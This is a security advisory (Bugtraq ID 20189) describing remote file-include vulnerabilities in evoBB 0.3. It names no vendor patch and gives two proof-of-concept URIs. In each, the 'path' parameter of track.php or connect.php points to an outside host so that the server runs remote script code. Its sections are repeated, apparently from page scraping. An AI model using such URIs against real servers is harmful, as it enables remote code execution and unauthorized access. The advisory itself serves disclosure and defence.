EvoBB Path Parameter Multiple Remote File Include Vulnerabilities
BID:20189
Info
EvoBB Path Parameter Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 20189 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 25 2006 12:00AM |
| Updated: | Sep 26 2006 07:11PM |
| Credit: | SHiKaA has been credited with the discovery of these vulnerabilities. |
| Vulnerable: |
evoBB evoBB 0.3 |
| Not Vulnerable: | |
Discussion
EvoBB Path Parameter Multiple Remote File Include Vulnerabilities
EvoBB is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
EvoBB 0.3 and prior versions are vulnerable to these issues.
EvoBB is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
EvoBB 0.3 and prior versions are vulnerable to these issues.
Exploit / POC
EvoBB Path Parameter Multiple Remote File Include Vulnerabilities
Attackers can exploit these issues via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/[Script Path]/track.php?path=http://www.example.com
http://www,example.com/[Script Path]/connect.php?path=http://www.example.com
Attackers can exploit these issues via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/[Script Path]/track.php?path=http://www.example.com
http://www,example.com/[Script Path]/connect.php?path=http://www.example.com
Solution / Fix
EvoBB Path Parameter Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
EvoBB Path Parameter Multiple Remote File Include Vulnerabilities
References:
References:
- evoBB Home Page (evoBB)